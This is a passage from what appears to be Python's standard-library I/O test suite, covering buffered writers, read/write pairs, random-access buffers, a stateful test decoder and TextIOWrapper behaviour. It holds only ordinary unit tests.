def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data.tobytes(), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), u'')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with support.check_py3k_warnings():
self.TextIOWrapper(b, encoding="hex_codec")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
@unittest.skipIf(sys.platform == 'cli', 'Bad behaviour in ironpython')
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
